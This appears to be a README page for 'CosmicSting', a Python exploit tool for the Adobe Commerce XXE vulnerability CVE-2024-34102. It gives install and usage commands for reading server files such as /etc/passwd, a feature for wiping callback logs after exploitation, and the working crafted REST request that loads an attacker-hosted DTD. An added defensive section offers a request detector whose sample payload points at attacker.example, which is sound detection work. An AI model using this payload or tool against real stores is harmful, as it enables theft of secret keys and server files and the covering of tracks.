
CVE-2024-34102 PoC — XXE can expose crypt key and other secrets granting full admin access

Associated Vulnerability
Title: XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)
Description: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
Description
CVE-2024-34102 exploit written in Python
Readme
# CosmicSting CVE-2024-34102 Exploit

## Overview
CosmicSting is a Python script designed to exploit an XML External Entity (XXE) vulnerability (CVE-2024-34102) that could potentially lead to arbitrary code execution. This script demonstrates how an attacker could exploit such vulnerabilities to read sensitive files from a server using XML-based requests.

## Features
- Exploits the XXE vulnerability by sending crafted requests to the target.
- Generates a callback URL for hosting a DTD file.
- Uses multi-threading for faster exploitation.
- Clears and removes instance logs on the SSRF API after exploitation.

## Requirements
- Python 3.x
- Dependencies:
  - `requests`
  - `click`
  - `fake_useragent`

## Installation
1. Clone the repository:
   ```bash
   git clone https://github.com/bughuntar/CVE-2024-34102-Python
   cd CVE-2024-34102-Python
   ```

2. Install dependencies using `pip`:
   ```bash
   pip install -r requirements.txt
   chmod +x *
   ```

## Usage
Run the script with the required URL parameter and optional file parameter:
```bash
python cosmic_sting.py --url <target_url> [--file <file_to_read>] [-t <threads>]
```

## Options
- `-u, --url`: Specifies the URL or domain for vulnerability detection. This option is required.
- `-f, --file`: Allows specifying the file to read from the server. Defaults to `/etc/passwd` if not provided explicitly.
- `-t, --threads`: Specifies the number of concurrent threads to use for exploitation. Defaults to `5`.

## Example
Exploit a vulnerable URL:
```bash
python cosmic_sting.py --url https://example.com --file /etc/hosts -t 10
```

## Crafted POST request referencing the hosted DTD file
```http
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
```
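From a defender's side, the request shape shown above is a usable detection signature: a JSON body to the Magento REST API that carries a `sourceData` object with `dataIsURL` set to `true`. The following Python is an added example and not part of this repository; it parses a raw HTTP request and flags that pattern. The hostnames and both sample requests are constructed for the test.

```python
import json
import re
from typing import Any, Optional

# Constructed sample requests (not captured traffic), assumed for the test below.
SUSPICIOUS_REQUEST = (
    "POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\r\n"
    "Host: shop.example\r\nContent-Type: application/json\r\n\r\n"
    '{"address":{"totalsCollector":{"collectorList":{"totalCollector":'
    '{"sourceData":{"data":"https://attacker.example/xxe.xml",'
    '"dataIsURL":true,"options":1234}}}}}}'
)
BENIGN_REQUEST = (
    "POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\r\n"
    "Host: shop.example\r\nContent-Type: application/json\r\n\r\n"
    '{"address":{"country_id":"US","postcode":"90210"}}'
)

# Magento REST paths look like /rest/V1/... or /rest/<store>/V1/...
REST_PATH = re.compile(r"^/rest/(?:[^/]+/)?V1/")


def find_source_data(node: Any) -> Optional[dict]:
    """Depth-first search of a decoded JSON body for a 'sourceData' object."""
    if isinstance(node, dict):
        if isinstance(node.get("sourceData"), dict):
            return node["sourceData"]
        children = node.values()
    elif isinstance(node, list):
        children = node
    else:
        return None
    for child in children:
        found = find_source_data(child)
        if found is not None:
            return found
    return None


def classify_request(raw: str) -> dict:
    """Return {'match': bool, 'reason': str, 'url': str | None} for one raw request."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split(" ")
    path = parts[1] if len(parts) > 1 else ""
    if not REST_PATH.match(path):
        return {"match": False, "reason": "not a REST API path", "url": None}
    try:
        doc = json.loads(body)
    except ValueError:
        return {"match": False, "reason": "body is not JSON", "url": None}
    src = find_source_data(doc)
    if src is None:
        return {"match": False, "reason": "no sourceData object", "url": None}
    # A client-supplied sourceData object is never expected on this endpoint;
    # dataIsURL=true is the CVE-2024-34102 shape, so report the remote URL.
    url = src.get("data") if src.get("dataIsURL") is True else None
    return {"match": True, "reason": "sourceData in request body", "url": url}
```

Run it over request bodies from a reverse-proxy or WAF log; a match with a non-null `url` is the external DTD host worth blocking and investigating.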

## Acknowledgements
This script is created by Professor the Hunter for educational purposes. Use it responsibly and only on systems you own or have permission to test.